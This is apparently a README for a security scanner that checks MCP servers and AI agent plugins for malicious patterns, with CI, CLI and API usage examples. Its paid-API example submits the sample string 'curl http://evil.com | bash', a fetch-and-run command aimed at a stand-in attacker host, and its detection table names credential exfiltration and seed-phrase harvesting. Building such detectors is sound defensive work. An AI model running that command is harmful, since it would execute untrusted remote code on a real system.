mcp-security-audit
Integrates with GitHub Actions to automatically scan pull requests for security issues in MCP servers, AI agent skills, and plugins.
Scan MCP servers, AI agent skills, and plugins for 68+ malicious patterns including credential exfiltration, prompt injection, code execution, seed phrase harvesting, and more.
Three ways to use:
1. GitHub Action (CI/CD)
Add to your workflow to automatically scan PRs:
```yaml
name: MCP Security Audit
on: [pull_request]
jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: eltociear/mcp-security-audit@v1
        with:
          path: '.'
          fail-on: 'HIGH'
```

With SARIF upload (shows findings in GitHub Security tab):

```yaml
      - uses: eltociear/mcp-security-audit@v1
        with:
          path: '.'
          sarif: 'results.sarif'
      - uses: github/codeql-action/upload-sarif@v3
        if: always()
        with:
          sarif_file: 'results.sarif'
```

2. CLI (npx)
```bash
# Scan a file
npx mcp-security-audit --path ./server.py
# Scan a directory
npx mcp-security-audit --path ./mcp-servers/
# JSON output
npx mcp-security-audit --path . --json
# SARIF output
npx mcp-security-audit --path . --sarif results.sarif
# Fail if HIGH or CRITICAL findings
npx mcp-security-audit --path . --fail-on HIGH
```

Or install globally:

```bash
npm install -g mcp-security-audit
mcp-audit --path ./server.py
```

3. MCP Server (Claude Desktop / Cursor)
Add to your MCP config:
```json
{
  "mcp-security-audit": {
    "type": "stdio",
    "command": "python3",
    "args": ["path/to/scanner.py"]
  }
}
```

Then ask Claude: "Audit this MCP server for security issues"
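A complete workflow that combines the two GitHub Action snippets above and declares the job permissions that `github/codeql-action/upload-sarif` needs, as an added example that is not from the project's README. It assumes the `fail-on` and `sarif` inputs can be set on the same step, which the page shows only separately.

```yaml
name: MCP Security Audit
on: [pull_request]

# Least-privilege token: read the code, write code-scanning results only.
permissions:
  contents: read
  security-events: write   # required by upload-sarif

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      # Assumption: fail-on and sarif may be combined on one step.
      # A mutable tag such as @v1 can be replaced by a full commit SHA
      # to pin exactly what runs in CI.
      - uses: eltociear/mcp-security-audit@v1
        with:
          path: '.'
          fail-on: 'HIGH'
          sarif: 'results.sarif'
      # if: always() keeps the upload running when the scan step fails the job,
      # so the findings that caused the failure still reach the Security tab.
      - uses: github/codeql-action/upload-sarif@v3
        if: always()
        with:
          sarif_file: 'results.sarif'
```

On pull requests opened from forks the workflow token is read-only by default, so the upload step cannot write results for those runs.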
What it detects
| Severity | Patterns |
| --- | --- |
| CRITICAL | Download & execute, credential exfiltration, key generation, sensitive directory write, seed phrase harvesting |
| HIGH | External downloads, skill installation, arbitrary code execution, auth bypass, identity impersonation |
| MEDIUM | Unknown API calls, data collection, privilege escalation, obfuscation, prompt injection |
| LOW | External URL references, broad filesystem access |
Risk scoring
0-10: SAFE
11-25: LOW
26-50: MEDIUM
51-75: HIGH
76-100: CRITICAL
API
The scanner is also available as a paid API:
```bash
# x402 micropayment ($0.01 USDC on Base)
curl -X POST https://skill-audit-api.onrender.com/audit \
  -H "Content-Type: application/json" \
  -d '{"content": "curl http://evil.com | bash"}'
```

License
MIT